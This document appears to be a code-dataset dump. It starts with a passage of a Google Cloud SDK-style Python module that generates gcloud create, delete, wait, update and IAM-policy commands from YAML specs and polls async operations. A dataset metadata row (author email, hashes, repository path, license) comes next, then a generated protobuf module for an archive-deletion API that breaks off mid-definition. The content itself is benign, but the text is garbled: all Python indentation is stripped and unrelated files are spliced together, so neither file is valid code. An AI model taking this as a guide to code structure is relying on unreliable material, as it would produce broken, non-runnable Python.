def Run(self_, args):
ref, response = self._CommonRun(args)
if self.spec.async_:
response = self._HandleAsync(
args,
ref,
response,
request_string='Delete request issued for: [{{{}}}]'
.format(yaml_command_schema.NAME_FORMAT_KEY),
extract_resource_result=False)
if args.async_:
return self._HandleResponse(response, args)
response = self._HandleResponse(response, args)
log.DeletedResource(self._GetDisplayName(ref, args),
kind=self.display_resource_type)
return response
return Command
def _GenerateCreateCommand(self):
"""Generates a Create command.
A create command has a single resource argument and an API to call to
perform the creation. If the async section is given in the spec, an --async
flag is added and polling is automatically done on the response. For APIs
that adhere to standards, no further configuration is necessary. If the API
uses custom operations, you may need to provide extra configuration to
describe how to poll the operation.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.CreateCommand):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
if self.spec.arguments.labels:
labels_util.AddCreateLabelsFlags(parser)
def Run(self_, args):
ref, response = self._CommonRun(args)
is_parent_resource = (self.spec.arguments.resource and
self.spec.arguments.resource.is_parent_resource)
if self.spec.async_:
if ref is not None and not is_parent_resource:
request_string = 'Create request issued for: [{{{}}}]'.format(
yaml_command_schema.NAME_FORMAT_KEY)
else:
request_string = 'Create request issued'
response = self._HandleAsync(
args, ref, response,
request_string=request_string)
if args.async_:
return self._HandleResponse(response, args)
if is_parent_resource:
# Data on responses from operation polling is stored in
# additionalProperties, so convert to dict for consistent behavior.
response_obj = encoding.MessageToDict(response)
# If the response is an operation that has a 'response' property that
# has a name, use that. Otherwise, use the 'name' property.
full_name = response_obj.get('response', {}).get('name')
if not full_name:
full_name = response_obj.get('name')
resource_name = resource_transform.TransformBaseName(full_name)
else:
resource_name = self._GetDisplayName(ref, args)
log.CreatedResource(resource_name, kind=self.display_resource_type)
response = self._HandleResponse(response, args)
return response
return Command
def _GenerateWaitCommand(self):
"""Generates a wait command for polling operations.
A wait command takes an operation reference and polls the status until it
is finished or errors out. This follows the exact same spec as in other
async commands except the primary operation (create, delete, etc) has
already been done. For APIs that adhere to standards, no further async
configuration is necessary. If the API uses custom operations, you may need
to provide extra configuration to describe how to poll the operation.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
@staticmethod
def Args(parser):
self._CommonArgs(parser)
def Run(self_, args):
ref = self.arg_generator.GetRequestResourceRef(args)
response = self._WaitForOperation(
ref, resource_ref=None, extract_resource_result=False,
args=args)
response = self._HandleResponse(response, args)
return response
return Command
@property
def _add_condition(self):
return self.spec.iam and self.spec.iam.enable_condition
def _GenerateGetIamPolicyCommand(self):
"""Generates a get-iam-policy command.
A get-iam-policy command has a single resource argument and an API method
to call to get the resource. The result is returned using the default
output format.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.ListCommand):
"""Get IAM policy command closure."""
@staticmethod
def Args(parser):
self._CommonArgs(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
_, response = self._CommonRun(args)
return self._HandleResponse(response, args)
return Command
def _GenerateSetIamPolicyCommand(self):
"""Generates a set-iam-policy command.
A set-iam-policy command takes a resource argument, a policy to set on that
resource, and an API method to call to set the policy on the resource. The
result is returned using the default output format.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
"""Set IAM policy command closure."""
@staticmethod
def Args(parser):
self._CommonArgs(parser)
iam_util.AddArgForPolicyFile(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
"""Called when command is executed."""
# Default Policy message and set IAM request message field names
policy_type_name = 'Policy'
policy_request_path = 'setIamPolicyRequest'
# Use Policy message and set IAM request field name overrides for API's
# with non-standard naming (if provided)
if self.spec.iam:
policy_type_name = (self.spec.iam.message_type_overrides['policy'] or
policy_type_name)
policy_request_path = (self.spec.iam.set_iam_policy_request_path or
policy_request_path)
policy_field_path = policy_request_path + '.policy'
policy_type = self.method.GetMessageByName(policy_type_name)
if not policy_type:
raise ValueError('Policy type [{}] not found.'.format(
policy_type_name))
policy, update_mask = iam_util.ParsePolicyFileWithUpdateMask(
args.policy_file, policy_type)
self.spec.request.static_fields[policy_field_path] = policy
self._SetPolicyUpdateMask(update_mask)
try:
ref, response = self._CommonRun(args)
except HttpBadRequestError as ex:
log.err.Print(
'ERROR: Policy modification failed. For bindings with conditions'
', run "gcloud alpha iam policies lint-condition" to identify '
'issues in conditions.'
)
raise ex
iam_util.LogSetIamPolicy(ref.Name(), self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _GenerateDeclarativeIamRolesCompleter(self):
"""Generate a IAM role completer."""
get_resource_ref = self.arg_generator.GetRequestResourceRef
class Completer(DeclarativeIamRolesCompleter):
def __init__(self, **kwargs):
super(Completer, self).__init__(
get_resource_ref=get_resource_ref, **kwargs)
return Completer
def _GenerateAddIamPolicyBindingCommand(self):
"""Generates an add-iam-policy-binding command.
An add-iam-policy-binding command adds a binding to a IAM policy. A
binding consists of a member, a role to define the role of the member, and
an optional condition to define in what condition the binding is valid.
Two API methods are called to get and set the policy on the resource.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
"""Add IAM policy binding command closure."""
@staticmethod
def Args(parser):
iam_util.AddArgsForAddIamPolicyBinding(
parser,
role_completer=self._GenerateDeclarativeIamRolesCompleter(),
add_condition=self._add_condition)
self._CommonArgs(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
"""Called when command is executed."""
# Use Policy message and set IAM request field name overrides for API's
# with non-standard naming (if provided)
policy_request_path = 'setIamPolicyRequest'
if self.spec.iam:
policy_request_path = (
self.spec.iam.set_iam_policy_request_path or policy_request_path)
policy_field_path = policy_request_path + '.policy'
policy = self._GetModifiedIamPolicyAddIamBinding(
args, add_condition=self._add_condition)
# override policy version
if self.spec.iam and self.spec.iam.policy_version:
policy.version = self.spec.iam.policy_version
self.spec.request.static_fields[policy_field_path] = policy
try:
ref, response = self._CommonRun(args)
except HttpBadRequestError as ex:
log.err.Print(
'ERROR: Policy modification failed. For a binding with condition'
', run "gcloud alpha iam policies lint-condition" to identify '
'issues in condition.'
)
raise ex
iam_util.LogSetIamPolicy(ref.Name(), self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _GenerateRemoveIamPolicyBindingCommand(self):
"""Generates a remove-iam-policy-binding command.
A remove-iam-policy-binding command removes a binding from a IAM policy. A
binding consists of a member, a role to define the role of the member, and
an optional condition to define in what condition the binding is valid.
Two API methods are called to get and set the policy on the resource.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
"""Remove IAM policy binding command closure."""
@staticmethod
def Args(parser):
iam_util.AddArgsForRemoveIamPolicyBinding(
parser,
role_completer=self._GenerateDeclarativeIamRolesCompleter(),
add_condition=self._add_condition)
self._CommonArgs(parser)
base.URI_FLAG.RemoveFromParser(parser)
def Run(self_, args):
"""Called when command is executed."""
# Use Policy message and set IAM request field name overrides for API's
# with non-standard naming (if provided)
policy_request_path = 'setIamPolicyRequest'
if self.spec.iam:
policy_request_path = (
self.spec.iam.set_iam_policy_request_path or policy_request_path)
policy_field_path = policy_request_path + '.policy'
policy = self._GetModifiedIamPolicyRemoveIamBinding(
args, add_condition=self._add_condition)
# override policy version
if self.spec.iam and self.spec.iam.policy_version:
policy.version = self.spec.iam.policy_version
self.spec.request.static_fields[policy_field_path] = policy
ref, response = self._CommonRun(args)
iam_util.LogSetIamPolicy(ref.Name(), self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _GenerateGenericCommand(self):
"""Generates a generic command.
A generic command has a resource argument, additional fields, and calls an
API method. It supports async if the async configuration is given. Any
fields is message_params will be generated as arguments and inserted into
the request message.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
# pylint: disable=missing-docstring
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
def Run(self_, args):
ref, response = self._CommonRun(args)
if self.spec.async_:
request_string = None
if ref:
request_string = 'Request issued for: [{{{}}}]'.format(
yaml_command_schema.NAME_FORMAT_KEY)
response = self._HandleAsync(
args, ref, response, request_string=request_string)
return self._HandleResponse(response, args)
return Command
def _GenerateUpdateCommand(self):
"""Generates an update command.
An update command has a resource argument, additional fields, and calls an
API method. It supports async if the async configuration is given. Any
fields is message_params will be generated as arguments and inserted into
the request message.
Currently, the Update command is the same as Generic command.
Returns:
calliope.base.Command, The command that implements the spec.
"""
# pylint: disable=no-self-argument, The class closure throws off the linter
# a bit. We want to use the generator class, not the class being generated.
# pylint: disable=protected-access, The linter gets confused about 'self'
# and thinks we are accessing something protected.
class Command(base.Command):
# pylint: disable=missing-docstring
@staticmethod
def Args(parser):
self._CommonArgs(parser)
if self.spec.async_:
base.ASYNC_FLAG.AddToParser(parser)
if self.spec.arguments.labels:
labels_util.AddUpdateLabelsFlags(parser)
def Run(self_, args):
# Check if mask is required for an update request, if required, return
# the dotted path, e.g updateRequest.fieldMask.
mask_path = update.GetMaskFieldPath(self.method)
if mask_path:
# If user sets to disable the auto-generated field mask, set the value
# to the empty string instead so that custom hooks can be used.
if self.spec.update and self.spec.update.disable_auto_field_mask:
mask_string = ''
else:
mask_string = update.GetMaskString(args, self.spec, mask_path)
self.spec.request.static_fields[mask_path] = mask_string
# Check if the update is full-update, which requires a get request.
existing_message = None
if self.spec.update:
if self.spec.update.read_modify_update:
existing_message = self._GetExistingResource(args)
ref, response = self._CommonRun(args, existing_message)
if self.spec.async_:
request_string = None
if ref:
request_string = 'Request issued for: [{{{}}}]'.format(
yaml_command_schema.NAME_FORMAT_KEY)
response = self._HandleAsync(
args, ref, response, request_string=request_string)
log.UpdatedResource(
self._GetDisplayName(ref, args), kind=self.display_resource_type)
return self._HandleResponse(response, args)
return Command
def _CommonArgs(self, parser):
"""Performs argument actions common to all commands.
Adds all generated arguments to the parser
Sets the command output format if specified
Args:
parser: The argparse parser.
"""
args = self.arg_generator.GenerateArgs()
for arg in args:
arg.AddToParser(parser)
if self.spec.arguments.additional_arguments_hook:
for arg in self.spec.arguments.additional_arguments_hook():
arg.AddToParser(parser)
if self.spec.output.format:
parser.display_info.AddFormat(self.spec.output.format)
if self.spec.output.flatten:
parser.display_info.AddFlatten(self.spec.output.flatten)
def _CommonRun(self, args, existing_message=None):
"""Performs run actions common to all commands.
Parses the resource argument into a resource reference
Prompts the user to continue (if applicable)
Calls the API method with the request generated from the parsed arguments
Args:
args: The argparse parser.
existing_message: the apitools message returned from previous request.
Returns:
(resources.Resource, response), A tuple of the parsed resource reference
and the API response from the method call.
"""
ref = self.arg_generator.GetRequestResourceRef(args)
if self.spec.input.confirmation_prompt:
console_io.PromptContinue(
self._Format(self.spec.input.confirmation_prompt, ref,
self._GetDisplayName(ref, args)),
throw_if_unattended=True, cancel_on_no=True)
if self.spec.request.modify_method_hook:
self.spec.request.method = self.spec.request.modify_method_hook(ref, args)
self.method = registry.GetMethod(
self.spec.request.collection, self.spec.request.method,
self.spec.request.api_version)
if self.spec.request.issue_request_hook:
# Making the request is overridden, just call into the custom code.
return ref, self.spec.request.issue_request_hook(ref, args)
if self.spec.request.create_request_hook:
# We are going to make the request, but there is custom code to create it.
request = self.spec.request.create_request_hook(ref, args)
else:
parse_resource = self.spec.request.parse_resource_into_request
request = self.arg_generator.CreateRequest(
args,
self.spec.request.static_fields,
self.spec.request.resource_method_params,
self.spec.arguments.labels,
self.spec.command_type,
use_relative_name=self.spec.request.use_relative_name,
parse_resource_into_request=parse_resource,
existing_message=existing_message,
override_method=self.method)
for hook in self.spec.request.modify_request_hooks:
request = hook(ref, args, request)
response = self.method.Call(request,
limit=self.arg_generator.Limit(args),
page_size=self.arg_generator.PageSize(args))
return ref, response
def _SetPolicyUpdateMask(self, update_mask):
"""Set Field Mask on SetIamPolicy request message.
If the API supports update_masks then adds the update_mask to the
SetIamPolicy request (via static fields).
Args:
update_mask: str, comma separated string listing the Policy fields to be
updated.
"""
# Standard names for SetIamPolicyRequest message and set IAM request
# field name
set_iam_policy_request = 'SetIamPolicyRequest'
policy_request_path = 'setIamPolicyRequest'
# Use SetIamPolicyRequest message and set IAM request field name overrides
# for API's with non-standard naming (if provided)
if self.spec.iam:
overrides = self.spec.iam.message_type_overrides
set_iam_policy_request = (overrides['set_iam_policy_request']
or set_iam_policy_request)
policy_request_path = (self.spec.iam.set_iam_policy_request_path
or policy_request_path)
mask_field_path = '{}.updateMask'.format(policy_request_path)
update_request = self.method.GetMessageByName(set_iam_policy_request)
if hasattr(update_request, 'updateMask'):
self.spec.request.static_fields[mask_field_path] = update_mask
def _GetIamPolicy(self, args):
"""GetIamPolicy helper function for add/remove binding."""
get_iam_method = registry.GetMethod(self.spec.request.collection,
'getIamPolicy',
self.spec.request.api_version)
get_iam_request = self.arg_generator.CreateRequest(
args,
use_relative_name=self.spec.request.use_relative_name,
override_method=get_iam_method)
if self.spec.iam and self.spec.iam.policy_version:
arg_utils.SetFieldInMessage(
get_iam_request,
self.spec.iam.get_iam_policy_version_path,
self.spec.iam.policy_version)
policy = get_iam_method.Call(get_iam_request)
return policy
def _GetModifiedIamPolicyAddIamBinding(self, args, add_condition=False):
"""Get the IAM policy and add the specified binding to it.
Args:
args: an argparse namespace.
add_condition: True if support condition.
Returns:
IAM policy.
"""
binding_message_type = self.method.GetMessageByName('Binding')
if add_condition:
condition = iam_util.ValidateAndExtractConditionMutexRole(args)
policy = self._GetIamPolicy(args)
condition_message_type = self.method.GetMessageByName('Expr')
iam_util.AddBindingToIamPolicyWithCondition(
binding_message_type, condition_message_type, policy, args.member,
args.role, condition)
else:
policy = self._GetIamPolicy(args)
iam_util.AddBindingToIamPolicy(binding_message_type, policy, args.member,
args.role)
return policy
def _GetModifiedIamPolicyRemoveIamBinding(self, args, add_condition=False):
"""Get the IAM policy and remove the specified binding to it.
Args:
args: an argparse namespace.
add_condition: True if support condition.
Returns:
IAM policy.
"""
if add_condition:
condition = iam_util.ValidateAndExtractCondition(args)
policy = self._GetIamPolicy(args)
iam_util.RemoveBindingFromIamPolicyWithCondition(
policy, args.member, args.role, condition, all_conditions=args.all)
else:
policy = self._GetIamPolicy(args)
iam_util.RemoveBindingFromIamPolicy(policy, args.member, args.role)
return policy
def _GetExistingResource(self, args):
get_method = registry.GetMethod(self.spec.request.collection, 'get',
self.spec.request.api_version)
get_arg_generator = arg_marshalling.DeclarativeArgumentGenerator(
get_method, [], self.spec.arguments.resource)
# TODO(b/111069150): Add error handling when get fails.
return get_method.Call(get_arg_generator.CreateRequest(args))
def _HandleAsync(self, args, resource_ref, operation,
request_string, extract_resource_result=True):
"""Handles polling for operations if the async flag is provided.
Args:
args: argparse.Namespace, The parsed args.
resource_ref: resources.Resource, The resource reference for the resource
being operated on (not the operation itself)
operation: The operation message response.
request_string: The format string to print indicating a request has been
issued for the resource. If None, nothing is printed.
extract_resource_result: bool, True to return the original resource as
the result or False to just return the operation response when it is
done. You would set this to False for things like Delete where the
resource no longer exists when the operation is done.
Returns:
The response (either the operation or the original resource).
"""
operation_ref = resources.REGISTRY.Parse(
getattr(operation, self.spec.async_.response_name_field),
collection=self.spec.async_.collection)
request_string = self.spec.async_.request_issued_message or request_string
if request_string:
log.status.Print(self._Format(request_string, resource_ref,
self._GetDisplayName(resource_ref, args)))
if args.async_:
log.status.Print(self._Format(
'Check operation [{{{}}}] for status.'
.format(yaml_command_schema.REL_NAME_FORMAT_KEY), operation_ref))
return operation
return self._WaitForOperation(
operation_ref, resource_ref, extract_resource_result, args=args)
def _WaitForOperation(self, operation_ref, resource_ref,
extract_resource_result, args=None):
poller = AsyncOperationPoller(
self.spec, resource_ref if extract_resource_result else None, args)
progress_string = self._Format(
'Waiting for operation [{{{}}}] to complete'.format(
yaml_command_schema.REL_NAME_FORMAT_KEY),
operation_ref)
return waiter.WaitFor(
poller, operation_ref, self._Format(
progress_string, resource_ref,
self._GetDisplayName(resource_ref, args) if args else None))
def _HandleResponse(self, response, args=None):
"""Process the API response.
Args:
response: The apitools message object containing the API response.
args: argparse.Namespace, The parsed args.
Raises:
core.exceptions.Error: If an error was detected and extracted from the
response.
Returns:
A possibly modified response.
"""
if self.spec.response.error:
error = self._FindPopulatedAttribute(
response, self.spec.response.error.field.split('.'))
if error:
messages = []
if self.spec.response.error.code:
messages.append('Code: [{}]'.format(
_GetAttribute(error, self.spec.response.error.code)))
if self.spec.response.error.message:
messages.append('Message: [{}]'.format(
_GetAttribute(error, self.spec.response.error.message)))
if messages:
raise exceptions.Error(' '.join(messages))
raise exceptions.Error(six.text_type(error))
if self.spec.response.result_attribute:
response = _GetAttribute(response, self.spec.response.result_attribute)
for hook in self.spec.response.modify_response_hooks:
response = hook(response, args)
return response
def _FindPopulatedAttribute(self, obj, attributes):
"""Searches the given object for an attribute that is non-None.
This digs into the object search for the given attributes. If any attribute
along the way is a list, it will search for sub-attributes in each item
of that list. The first match is returned.
Args:
obj: The object to search
attributes: [str], A sequence of attributes to use to dig into the
resource.
Returns:
The first matching instance of the attribute that is non-None, or None
if one could nto be found.
"""
if not attributes:
return obj
attr = attributes[0]
try:
obj = getattr(obj, attr)
except AttributeError:
return None
if isinstance(obj, list):
for x in obj:
obj = self._FindPopulatedAttribute(x, attributes[1:])
if obj:
return obj
return self._FindPopulatedAttribute(obj, attributes[1:])
def _Format(self, format_string, resource_ref, display_name=None):
"""Formats a string with all the attributes of the given resource ref.
Args:
format_string: str, The format string.
resource_ref: resources.Resource, The resource reference to extract
attributes from.
display_name: the display name for the resource.
Returns:
str, The formatted string.
"""
if resource_ref:
d = resource_ref.AsDict()
d[yaml_command_schema.NAME_FORMAT_KEY] = (
display_name or resource_ref.Name())
d[yaml_command_schema.REL_NAME_FORMAT_KEY] = resource_ref.RelativeName()
else:
d = {yaml_command_schema.NAME_FORMAT_KEY: display_name}
d[yaml_command_schema.RESOURCE_TYPE_FORMAT_KEY] = self.display_resource_type
return format_string.format(**d)
def _RegisterURIFunc(self, args):
"""Generates and registers a function to create a URI from a resource.
Args:
args: The argparse namespace.
Returns:
f(resource) -> str, A function that converts the given resource payload
into a URI.
"""
def URIFunc(resource):
id_value = getattr(
resource, self.spec.response.id_field)
ref = self.arg_generator.GetResponseResourceRef(id_value, args)
return ref.SelfLink()
args.GetDisplayInfo().AddUriFunc(URIFunc)
def _ConfigureGlobalAttributes(self, command):
"""Configures top level attributes of the generated command.
Args:
command: The command being generated.
"""
if self.spec.hidden:
command = base.Hidden(command)
if self.spec.release_tracks:
command = base.ReleaseTracks(*self.spec.release_tracks)(command)
if not hasattr(command, 'detailed_help'):
key_map = {
'description': 'DESCRIPTION',
'examples': 'EXAMPLES',
}
command.detailed_help = {
key_map.get(k, k): v for k, v in self.spec.help_text.items()}
command.detailed_help['API REFERENCE'] = (
'This command uses the *{}/{}* API. The full documentation for this '
'API can be found at: {}'.format(
self.method.collection.api_name, self.method.collection.api_version,
self.method.collection.docs_url))
def _GetDisplayName(self, resource_ref, args):
if (self.spec.arguments.resource
and self.spec.arguments.resource.display_name_hook):
return self.spec.arguments.resource.display_name_hook(resource_ref, args)
return resource_ref.Name() if resource_ref else None
class AsyncOperationPoller(waiter.OperationPoller):
"""An implementation of a operation poller."""
def __init__(self, spec, resource_ref, args):
"""Creates the poller.
Args:
spec: yaml_command_schema.CommandData, the spec for the command being
generated.
resource_ref: resources.Resource, The resource reference for the resource
being operated on (not the operation itself). If None, the operation
will just be returned when it is done instead of getting the resulting
resource.
args: Namespace, The args namespace.
"""
self.spec = spec
self.resource_ref = resource_ref
if not self.spec.async_.extract_resource_result:
self.resource_ref = None
self.method = registry.GetMethod(
spec.async_.collection, spec.async_.method,
api_version=spec.async_.api_version or spec.request.api_version)
self.args = args
def IsDone(self, operation):
"""Overrides."""
result = getattr(operation, self.spec.async_.state.field)
if isinstance(result, apitools_messages.Enum):
result = result.name
if (result in self.spec.async_.state.success_values or
result in self.spec.async_.state.error_values):
# We found a value that means it is done.
error = getattr(operation, self.spec.async_.error.field)
if not error and result in self.spec.async_.state.error_values:
error = 'The operation failed.'
# If we succeeded but there is an error, or if an error was detected.
if error:
raise waiter.OperationError(SerializeError(error))
return True
return False
def Poll(self, operation_ref):
"""Overrides.
Args:
operation_ref: googlecloudsdk.core.resources.Resource.
Returns:
fetched operation message.
"""
request_type = self.method.GetRequestType()
relative_name = operation_ref.RelativeName()
fields = {
f.name: getattr(
operation_ref,
self.spec.async_.operation_get_method_params.get(f.name, f.name),
relative_name)
for f in request_type.all_fields()}
request = request_type(**fields)
for hook in self.spec.async_.modify_request_hooks:
request = hook(operation_ref, self.args, request)
return self.method.Call(request)
def GetResult(self, operation):
"""Overrides.
Args:
operation: api_name_messages.Operation.
Returns:
result of result_service.Get request.
"""
result = operation
if self.resource_ref:
method = self._ResourceGetMethod()
request = method.GetRequestType()()
arg_utils.ParseResourceIntoMessage(self.resource_ref, method, request)
result = method.Call(request)
return _GetAttribute(result, self.spec.async_.result_attribute)
def _ResourceGetMethod(self):
return registry.GetMethod(
self.spec.request.collection, self.spec.async_.resource_get_method,
api_version=self.spec.request.api_version)
def SerializeError(error):
"""Serializes the error message for better format."""
if isinstance(error, six.string_types):
return error
try:
return json.dumps(
encoding.MessageToDict(error),
indent=2,
sort_keys=True,
separators=(',', ': '))
except Exception: # pylint: disable=broad-except
# try the best, fall back to return error
return error
def _GetAttribute(obj, attr_path):
"""Gets attributes and sub-attributes out of an object.
Args:
obj: The object to extract the attributes from.
attr_path: str, The dotted path of attributes to extract.
Raises:
AttributeError: If the attribute doesn't exist on the object.
Returns:
The desired attribute or None if any of the parent attributes were None.
"""
if attr_path:
for attr in attr_path.split('.'):
try:
if obj is None:
return None
obj = getattr(obj, attr)
except AttributeError:
raise AttributeError(
'Attribute path [{}] not found on type [{}]'.format(attr_path,
type(obj)))
return obj
|
[
"zeus@localhost.localdomain"
] |
zeus@localhost.localdomain
|
4a51875b3edcd02fd9bbea7c81ba2ae177206124
|
bc441bb06b8948288f110af63feda4e798f30225
|
/file_repository_sdk/api/archive/delete_archive_v2_pb2.py
|
4e6598b19a4aa4e762abfd7d0d2de6f7c40ee8c6
|
[
"Apache-2.0"
] |
permissive
|
easyopsapis/easyops-api-python
|
23204f8846a332c30f5f3ff627bf220940137b6b
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
refs/heads/master
| 2020-06-26T23:38:27.308803
| 2020-06-16T07:25:41
| 2020-06-16T07:25:41
| 199,773,131
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| true
| 8,785
|
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: delete_archive_v2.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='delete_archive_v2.proto',
package='archive',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x17\x64\x65lete_archive_v2.proto\x12\x07\x61rchive\"g\n\x16\x44\x65leteArchiveV2Request\x12\x12\n\ndeleteFile\x18\x01 \x01(\t\x12\x13\n\x0blastVersion\x18\x02 \x01(\t\x12\x11\n\tpackageId\x18\x03 \x01(\t\x12\x11\n\tversionId\x18\x04 \x01(\t\"U\n\x17\x44\x65leteArchiveV2Response\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\r\n\x05\x65rror\x18\x02 \x01(\t\x12\x0f\n\x07message\x18\x03 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x04 \x01(\t\"\x82\x01\n\x1e\x44\x65leteArchiveV2ResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12.\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32 .archive.DeleteArchiveV2Responseb\x06proto3')
)
_DELETEARCHIVEV2REQUEST = _descriptor.Descriptor(
name='DeleteArchiveV2Request',
full_name='archive.DeleteArchiveV2Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='deleteFile', full_name='archive.DeleteArchiveV2Request.deleteFile', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='lastVersion', full_name='archive.DeleteArchiveV2Request.lastVersion', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='archive.DeleteArchiveV2Request.packageId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='archive.DeleteArchiveV2Request.versionId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=36,
serialized_end=139,
)
_DELETEARCHIVEV2RESPONSE = _descriptor.Descriptor(
name='DeleteArchiveV2Response',
full_name='archive.DeleteArchiveV2Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='archive.DeleteArchiveV2Response.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='archive.DeleteArchiveV2Response.error', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='archive.DeleteArchiveV2Response.message', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='archive.DeleteArchiveV2Response.data', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=141,
serialized_end=226,
)
_DELETEARCHIVEV2RESPONSEWRAPPER = _descriptor.Descriptor(
name='DeleteArchiveV2ResponseWrapper',
full_name='archive.DeleteArchiveV2ResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='archive.DeleteArchiveV2ResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='archive.DeleteArchiveV2ResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='archive.DeleteArchiveV2ResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
